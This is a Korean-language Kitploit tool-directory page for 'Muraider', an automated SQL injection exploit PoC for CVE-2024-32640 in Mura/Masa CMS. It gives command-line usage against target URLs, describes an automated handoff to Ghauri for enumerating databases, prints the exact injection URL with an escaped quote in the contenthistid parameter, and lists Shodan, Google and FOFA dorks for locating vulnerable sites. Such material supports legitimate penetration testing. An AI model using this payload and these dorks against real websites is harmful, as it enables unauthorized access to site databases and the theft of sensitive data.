Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-32640-SQLI-MuraCMS — CVE-2024-32640 | 자동화된 SQL 인젝션 익스플로잇 PoC | Kitploit
도구/GitHubGitHub/stuub/cve-2024-32640-sqli-muracms
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubstuub/cve-2024-32640-sqli-muracms

CVE-2024-32640-SQLI-MuraCMS

CVE-2024-32640 | 자동화된 SQL 인젝션 익스플로잇 PoC

저장소 보기
781212년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Muraider - CVE-2024-32640 탐지 및 익스플로잇 자동화 \ Mura/Masa CMS의 SQLi

사용법

탐지:

python3 CVE-2024-32640.py --url https://target.com/

Ghauri 익스플로잇 ('-g' 또는 '--ghauri' 인수 사용):

Ghauri와 함께 사용하려는 인수를 해당 인수 목록에 따라 구문 분석하세요:

python3 CVE-2024-32640.py --url https://target.com -g "--dbs --current-db"

python3 CVE-2024-32640.py --url https://target.com --ghauri "--dbs --current-db"

예제

image

Ghauri SQLI 자동화:

이 도구에 구현된 탐지 기능을 사용하여 취약한 대상을 Ghauri로 익스플로잇할 수 있습니다. 스크립트는 이 과정을 자동화하며, 필요한 모든 대상 정보를 구문 분석하여 Ghauri 호출에 전달합니다.

image

세부 사항

contenthisid HTML 쿼리 매개변수 값에 이스케이프 시퀀스(%5c)를 추가하면 대상이 이 SQLi에 취약한지 확인할 수 있습니다.

성공적인 익스플로잇은 민감한 데이터에 대한 무단 액세스로 이어질 수 있습니다.

URL: https://target.com/_api/json/v1/default/?method=processAsyncObject&object=displayregion&contenthistid=x%5c'&previewID=x

Dorks

Shodan-query: 'Generator: Masa CMS'

Google: "powered by Mura CMS"

FOFA: app="Mura-CMS"

참고 자료:

https://twitter.com/HunterMapping/status/1790620695371911388

https://www.seebug.org/vuldb/ssvid-99835

도구 다운로드